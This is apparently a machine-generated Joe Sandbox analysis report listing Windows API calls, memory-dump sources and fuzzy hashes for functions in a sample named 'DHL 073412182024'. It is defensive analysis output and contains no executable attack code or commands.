                                                                                      • StrokePath.GDI32(?), ref: 00E38AA0
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                                                      • String ID:
                                                                                      • API String ID: 43455801-0
                                                                                      • Opcode ID: 5be73592471570d585094dafc81c33cbff41d3e202fe2dddb69b848a798f3f5b
                                                                                      • Instruction ID: a4f34f852597fffc5b3951c169663f841a7d5d7025998b0203c344445fb89af1
                                                                                      • Opcode Fuzzy Hash: 5be73592471570d585094dafc81c33cbff41d3e202fe2dddb69b848a798f3f5b
                                                                                      • Instruction Fuzzy Hash: 30111B7600024CFFDF129F95DC88EAA7F6CEB08394F108052FA19AA1A1C7719D59DFA0
                                                                                      APIs
                                                                                      • GetDC.USER32(00000000), ref: 00E05218
                                                                                      • GetDeviceCaps.GDI32(00000000,00000058), ref: 00E05229
                                                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00E05230
                                                                                      • ReleaseDC.USER32(00000000,00000000), ref: 00E05238
                                                                                      • MulDiv.KERNEL32(000009EC,?,00000000), ref: 00E0524F
                                                                                      • MulDiv.KERNEL32(000009EC,00000001,?), ref: 00E05261
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: CapsDevice$Release
                                                                                      • String ID:
                                                                                      • API String ID: 1035833867-0
                                                                                      • Opcode ID: 190d8deacec6c0d4c332e476c89b2def59d1b42334a9c6fe362044f8ea3ce34a
                                                                                      • Instruction ID: 303d02c3b8c5bbc9d4f9273cc847c69133b28064ae6e4c8f3a7e4fcf1857dfe7
                                                                                      • Opcode Fuzzy Hash: 190d8deacec6c0d4c332e476c89b2def59d1b42334a9c6fe362044f8ea3ce34a
                                                                                      • Instruction Fuzzy Hash: 0D018F76A00709BFEB109BA69C49A5EBFB8EF48751F144066FA04F7290D670D804CFA0
                                                                                      APIs
                                                                                      • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00DA1BF4
                                                                                      • MapVirtualKeyW.USER32(00000010,00000000), ref: 00DA1BFC
                                                                                      • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00DA1C07
                                                                                      • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00DA1C12
                                                                                      • MapVirtualKeyW.USER32(00000011,00000000), ref: 00DA1C1A
                                                                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 00DA1C22
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: Virtual
                                                                                      • String ID:
                                                                                      • API String ID: 4278518827-0
                                                                                      • Opcode ID: 47717f7934b72365e5ee47f23fb7cd8ad52dc942c18805c4fc6fc51235df21fd
                                                                                      • Instruction ID: d2305cb3d33a47d1f738c28f8c01394d7520ed5a6e1a200b740b9e1c6feea484
                                                                                      • Opcode Fuzzy Hash: 47717f7934b72365e5ee47f23fb7cd8ad52dc942c18805c4fc6fc51235df21fd
                                                                                      • Instruction Fuzzy Hash: 17016CB09027597DE3008F5A8C85B52FFA8FF19754F00411B915C47941C7F5A864CBE5
                                                                                      APIs
                                                                                      • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00E0EB30
                                                                                      • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00E0EB46
                                                                                      • GetWindowThreadProcessId.USER32(?,?), ref: 00E0EB55
                                                                                      • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00E0EB64
                                                                                      • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00E0EB6E
                                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00E0EB75
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                                      • String ID:
                                                                                      • API String ID: 839392675-0
                                                                                      • Opcode ID: 6b904fd67bd748462ee9a3396b604ca982e7d2b63472db2977c3a498eae6c4cb
                                                                                      • Instruction ID: 3222627dfc763612b099e535456f98a847a24e95c3bd3724297298b2c0b0fbf0
                                                                                      • Opcode Fuzzy Hash: 6b904fd67bd748462ee9a3396b604ca982e7d2b63472db2977c3a498eae6c4cb
                                                                                      • Instruction Fuzzy Hash: 89F01772241158BFE6215B639C0EEAB3E7CEBCAF11F104158F602F119196A09A059BB5
                                                                                      APIs
                                                                                      • GetClientRect.USER32(?), ref: 00DF7452
                                                                                      • SendMessageW.USER32(?,00001328,00000000,?), ref: 00DF7469
                                                                                      • GetWindowDC.USER32(?), ref: 00DF7475
                                                                                      • GetPixel.GDI32(00000000,?,?), ref: 00DF7484
                                                                                      • ReleaseDC.USER32(?,00000000), ref: 00DF7496
                                                                                      • GetSysColor.USER32(00000005), ref: 00DF74B0
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: ClientColorMessagePixelRectReleaseSendWindow
                                                                                      • String ID:
                                                                                      • API String ID: 272304278-0
                                                                                      • Opcode ID: 5f24381f511e4b6ba2677215f58a072971adca29ed046b07ed3526b152d94d2a
                                                                                      • Instruction ID: 77f486e2b9d6e25c08edd368246319d334b7ae7dfa017870fb565e8a485ef397
                                                                                      • Opcode Fuzzy Hash: 5f24381f511e4b6ba2677215f58a072971adca29ed046b07ed3526b152d94d2a
                                                                                      • Instruction Fuzzy Hash: F7018B31400209FFEB105F65DC0DBEA7FB5FB04311F254060FA1AB20A0CB319E55AB61
                                                                                      APIs
                                                                                      • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00E0187F
                                                                                      • UnloadUserProfile.USERENV(?,?), ref: 00E0188B
                                                                                      • CloseHandle.KERNEL32(?), ref: 00E01894
                                                                                      • CloseHandle.KERNEL32(?), ref: 00E0189C
                                                                                      • GetProcessHeap.KERNEL32(00000000,?), ref: 00E018A5
                                                                                      • HeapFree.KERNEL32(00000000), ref: 00E018AC
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                                      • String ID:
                                                                                      • API String ID: 146765662-0
                                                                                      • Opcode ID: bb7f32828fe83df61089914bf9ba0f5a5732dba465f6026e6a44dee2075dea3f
                                                                                      • Instruction ID: 8b4e0d071d753abbea10839d440e398033388bbdc5be4da5a8df31f2ebdfb8ca
                                                                                      • Opcode Fuzzy Hash: bb7f32828fe83df61089914bf9ba0f5a5732dba465f6026e6a44dee2075dea3f
                                                                                      • Instruction Fuzzy Hash: F2E0C236004109BFDA015BA2ED0C90ABF39FB49B22B218221F225B1071CB329474EB50
                                                                                      APIs
                                                                                      • __Init_thread_footer.LIBCMT ref: 00DABEB3
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: Init_thread_footer
                                                                                      • String ID: D%$D%$D%$D%
                                                                                      • API String ID: 1385522511-2722557190
                                                                                      • Opcode ID: c7db29b89d633be61e0e4b293d6748c8c9d0a7f05a4f591e629d7dc70612173a
                                                                                      • Instruction ID: 92cfa59a6c6aa14a4362b951c65d77f48a16c51eee60b1aed8b47d04db6f0e89
                                                                                      • Opcode Fuzzy Hash: c7db29b89d633be61e0e4b293d6748c8c9d0a7f05a4f591e629d7dc70612173a
                                                                                      • Instruction Fuzzy Hash: 34912D75A00206DFCB14CF69C091AA9B7F1FF5A320F24815ED586AB352D731ED82DBA0
                                                                                      APIs
                                                                                        • Part of subcall function 00DA7620: _wcslen.LIBCMT ref: 00DA7625
                                                                                      • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00E0C6EE
                                                                                      • _wcslen.LIBCMT ref: 00E0C735
                                                                                      • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00E0C79C
                                                                                      • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00E0C7CA
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: ItemMenu$Info_wcslen$Default
                                                                                      • String ID: 0
                                                                                      • API String ID: 1227352736-4108050209
                                                                                      • Opcode ID: 9984342f84c01ede91b3724d9cd5840c42893d679a5c60704094dd9ac34d3adc
                                                                                      • Instruction ID: c00a6c18b0db4c150a45af6c9ec4470bafb112f2bba54dd9ec331eed1896a907
                                                                                      • Opcode Fuzzy Hash: 9984342f84c01ede91b3724d9cd5840c42893d679a5c60704094dd9ac34d3adc
                                                                                      • Instruction Fuzzy Hash: F451C4716043019BD7149F38D845BAA77E4EF89718F28272EF595F31D0DB70D9848B62
                                                                                      APIs
                                                                                      • ShellExecuteExW.SHELL32(0000003C), ref: 00E2AEA3
                                                                                        • Part of subcall function 00DA7620: _wcslen.LIBCMT ref: 00DA7625
                                                                                      • GetProcessId.KERNEL32(00000000), ref: 00E2AF38
                                                                                      • CloseHandle.KERNEL32(00000000), ref: 00E2AF67
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: CloseExecuteHandleProcessShell_wcslen
                                                                                      • String ID: <$@
                                                                                      • API String ID: 146682121-1426351568
                                                                                      • Opcode ID: dac2101b7f776b77331c0dbb72428c16c0220569ab64b02e61b3b3d33d2c77ac
                                                                                      • Instruction ID: d9e8c38a55a67dd911e680b31736ea95d6ad797dcda3ff491e3313e11e502e28
                                                                                      • Opcode Fuzzy Hash: dac2101b7f776b77331c0dbb72428c16c0220569ab64b02e61b3b3d33d2c77ac
                                                                                      • Instruction Fuzzy Hash: 78717F71A00625DFCB14EF54D484A9EBBF0FF09314F0984A9E856AB392C774ED45CBA1
                                                                                      APIs
                                                                                      • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00E07206
                                                                                      • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 00E0723C
                                                                                      • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 00E0724D
                                                                                      • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00E072CF
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: ErrorMode$AddressCreateInstanceProc
                                                                                      • String ID: DllGetClassObject
                                                                                      • API String ID: 753597075-1075368562
                                                                                      • Opcode ID: d872a4d60f689cc4f3d9dd5d517d4bf94a43e5ef03505203457dde7319e94d2b
                                                                                      • Instruction ID: c0fb258f981f0f1b48117aa090397255de5ad74dec8a45a75f6aa71717c76ef1
                                                                                      • Opcode Fuzzy Hash: d872a4d60f689cc4f3d9dd5d517d4bf94a43e5ef03505203457dde7319e94d2b
                                                                                      • Instruction Fuzzy Hash: F54181B1A04204EFDB15CF54C884A9A7FB9EF44314F2590A9BD45BF25AD7B0ED84CBA0
                                                                                      APIs
                                                                                      • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00E33E35
                                                                                      • IsMenu.USER32(?), ref: 00E33E4A
                                                                                      • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00E33E92
                                                                                      • DrawMenuBar.USER32 ref: 00E33EA5
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: Menu$Item$DrawInfoInsert
                                                                                      • String ID: 0
                                                                                      • API String ID: 3076010158-4108050209
                                                                                      • Opcode ID: 8b1235701566435b231d847c562a53b9a5c7ed72b15cb7a6acf81dee0d961db3
                                                                                      • Instruction ID: 1126a330f51e0d58011cff8755a689e0a103c0e565d9f447208d3242829c9568
                                                                                      • Opcode Fuzzy Hash: 8b1235701566435b231d847c562a53b9a5c7ed72b15cb7a6acf81dee0d961db3
                                                                                      • Instruction Fuzzy Hash: 48415675A00309AFDB10DF66D888EEABBB9FF48358F145229E905A7250D730EE45CF60
                                                                                      APIs
                                                                                        • Part of subcall function 00DA9CB3: _wcslen.LIBCMT ref: 00DA9CBD
                                                                                        • Part of subcall function 00E03CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00E03CCA
                                                                                      • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00E01E66
                                                                                      • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00E01E79
                                                                                      • SendMessageW.USER32(?,00000189,?,00000000), ref: 00E01EA9
                                                                                        • Part of subcall function 00DA6B57: _wcslen.LIBCMT ref: 00DA6B6A
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend$_wcslen$ClassName
                                                                                      • String ID: ComboBox$ListBox
                                                                                      • API String ID: 2081771294-1403004172
                                                                                      • Opcode ID: 6b88aae052829fb12756c1f5acf287310b96a9f09bb795503c76151b081a15db
                                                                                      • Instruction ID: 724fe906e871fa9dce9dc2fe368e37888acf52544fbbb14249263befec62dd5a
                                                                                      • Opcode Fuzzy Hash: 6b88aae052829fb12756c1f5acf287310b96a9f09bb795503c76151b081a15db
                                                                                      • Instruction Fuzzy Hash: 2C210771A00104BFDB149B74DC56CFFBBB8DF46354B145159F816B71E1DB34894A8630
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: _wcslen
                                                                                      • String ID: HKEY_LOCAL_MACHINE$HKLM
                                                                                      • API String ID: 176396367-4004644295
                                                                                      • Opcode ID: 057e93bd9452af5538d64926a4e16fcfe932e397232cfa1f82b643df354cf3ab
                                                                                      • Instruction ID: 2d96898c5a19a28c8d1a348fb660ec9ccdd07d8092a70314a500be5ed12f0c36
                                                                                      • Opcode Fuzzy Hash: 057e93bd9452af5538d64926a4e16fcfe932e397232cfa1f82b643df354cf3ab
                                                                                      • Instruction Fuzzy Hash: 233109B3A0017A4BCB20DF6CF8515BE33919BA1798B256129E8477B244EA71CE44D3B0
                                                                                      APIs
                                                                                      • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00E32F8D
                                                                                      • LoadLibraryW.KERNEL32(?), ref: 00E32F94
                                                                                      • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00E32FA9
                                                                                      • DestroyWindow.USER32(?), ref: 00E32FB1
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend$DestroyLibraryLoadWindow
                                                                                      • String ID: SysAnimate32
                                                                                      • API String ID: 3529120543-1011021900
                                                                                      • Opcode ID: 8829b6dc96caf47b51922466b906550150ac3bec5c852024ff091b2d89bc56fc
                                                                                      • Instruction ID: c2ea3aedbf39cc8416811698c286082e82d59f373a77bad958a03283c41f1f49
                                                                                      • Opcode Fuzzy Hash: 8829b6dc96caf47b51922466b906550150ac3bec5c852024ff091b2d89bc56fc
                                                                                      • Instruction Fuzzy Hash: 31218B71204209AFEB104F649C89EBB7BB9EB59368F10621CFA90B2190D671DC91D760
                                                                                      APIs
                                                                                      • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00DC4D1E,00DD28E9,?,00DC4CBE,00DD28E9,00E688B8,0000000C,00DC4E15,00DD28E9,00000002), ref: 00DC4D8D
                                                                                      • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00DC4DA0
                                                                                      • FreeLibrary.KERNEL32(00000000,?,?,?,00DC4D1E,00DD28E9,?,00DC4CBE,00DD28E9,00E688B8,0000000C,00DC4E15,00DD28E9,00000002,00000000), ref: 00DC4DC3
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: AddressFreeHandleLibraryModuleProc
                                                                                      • String ID: CorExitProcess$mscoree.dll
                                                                                      • API String ID: 4061214504-1276376045
                                                                                      • Opcode ID: 3f3350fd7278cf10d66f52635b26e59756c7c826aead2739398e380e306ea27f
                                                                                      • Instruction ID: a924ed074ad6a4a68c91306ca583a136cd352f4772a3770edd59e9f6745353e9
                                                                                      • Opcode Fuzzy Hash: 3f3350fd7278cf10d66f52635b26e59756c7c826aead2739398e380e306ea27f
                                                                                      • Instruction Fuzzy Hash: BAF03C35A40209BFDB11AF91DC4DBAEBFB5EF44751F1401A9E90AB2260CB709A44DBA1
                                                                                      APIs
                                                                                      • LoadLibraryA.KERNEL32 ref: 00DFD3AD
                                                                                      • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 00DFD3BF
                                                                                      • FreeLibrary.KERNEL32(00000000), ref: 00DFD3E5
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
